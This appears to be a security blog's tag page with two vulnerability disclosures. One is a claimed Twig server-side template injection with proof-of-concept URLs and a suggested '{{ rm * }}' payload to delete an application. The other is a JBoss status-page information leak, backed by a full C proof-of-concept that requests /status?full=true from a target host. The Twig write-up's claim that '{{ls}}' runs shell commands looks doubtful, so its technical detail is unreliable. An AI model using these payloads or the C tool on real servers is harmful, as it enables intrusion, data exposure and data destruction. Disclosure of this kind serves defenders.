Posts Tagged

cyber security

Zero Day Twig PHP template engine

Twig is a modern template engine for PHP, its flexible, fast, and secure template engine for PHP.If you have any exposure to other text-based template languages, such as Smarty, Django, or Jinja, you should feel right at home with Twig. It’s both designer and developer friendly by sticking to PHP’s principles and adding functionality useful for templating environments.

ExploitDB link:

https://www.exploit-db.com/exploits/44102

Well, Twig {Latest version} is affected to Server-Side Template Injection and {{Command execution}}.

Exploit:

Twig <=2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string”, depends on the vulnerable application, which takes deferent params by GET or POST.

1.POC:

Example: by injecting this in a search param http://localhost/search?search_key={{4*4}} >        Output: 16

2. POC:

http://localhost/search?search_key={{4*4}}

http://localhost/search?search_key={{ls}}

OUTPUT: list of files/directories etc….

See the screenshot bellow how its executing the command and printing out the results, this could be also {{ rm * }} which will delete the entire application 🙂

JBoss sensitive information disclosure vulnerability

By requesting the Status File with full param and setting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address. Example: http://127.0.01/status?full=true

ExploitDB Link: 

https://www.exploit-db.com/exploits/44009/

Proof of Concept

//
//  main.c
//  jobss information disclosure POC
//
//  Created by JameelNabbo  on 2/8/18.
//  Website www.jameelnabbo.com
//  LAB     www.uitsec.com
//  CopyRight © 2018 Jameel Nabbo. All rights reserved.
//

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>


int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
    
    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
    
    if(sock == -1){
        perror("setsockopt");
        exit(1);
    }
    
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
        
    }
    return sock;
}

#define BUFFER_SIZE 1024

int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
    
    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }
    
    fd = socket_connect(argv[1], atoi(argv[2]));
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
         fprintf(stderr, "%s", buffer);
    }

    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}

Solution:
Update to version 4.2.3 or later